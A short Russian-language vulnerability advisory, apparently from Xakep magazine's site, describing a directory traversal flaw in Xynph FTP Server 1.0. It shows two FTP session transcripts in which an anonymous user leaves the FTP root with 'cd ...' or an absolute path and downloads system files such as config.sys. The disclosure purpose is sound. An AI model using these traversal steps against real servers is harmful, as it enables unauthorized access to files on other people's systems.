Неавторизованный доступ к системе в Xynph FTP

Рекомендуем почитать:

Xakep #299. Sysmon

• Содержание выпуска
• Подписка на «Хакер»-60%

Xynph FTP Server – FTP сервер для Windows систем. Обнаруженная уязвимость позволяет удаленному атакующему выйти за пределы FTP root каталога, используя относительный путь. Уязвимость позволяет атакующему получить несанкционированный доступ к уязвимой системе.

Пример: 

Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> pwd
257 "C:/Temp/" is current directory.
Ftp> cd ..
501 CWD failed. No permission
Ftp> cd ...
250 CWD command successful. "C:/Temp/.../" is current directory.
Ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 .
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 ..
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 Programme
drw-rw-rw- 1 ftp ftp 0 Sep 21 2002 command.com
......
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> get config.sys
200 Port command successful.
150 Opening data connection for config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.06Sekunden 2.92KB/Sek.
Ftp>

Еще один:

Ftp> open zero-x
Verbindung mit zero-x.
220 Herzlich Willkommen!
<-Xynph FTP-Server->
Benutzer (zero-x:(none)): anonymous
331 Password required for anonymous.
Kennwort: billsucks
230 User anonymous logged in.
Ftp> get c:\config.sys
200 Port command successful.
150 Opening data connection for c:\config.sys.
226 File sent ok
Ftp: 1337 Bytes empfangen in 0.00Sekunden 175000.00KB/Sek.
Ftp> dir a:200 Port command successful.
150 Opening data connection for directory list.
-rw-rw-rw- 1 ftp ftp 305113 Dec 15 2002 1.jpg
-rw-rw-rw- 1 ftp ftp 313497 Dec 15 2002 4.jpg
.....
226 File sent ok
Ftp: 31337 Bytes empfangen in 0.00Sekunden 244000.00KB/Sek.
Ftp>

Уязвимость обнаружена в Xynph FTP Server 1.0.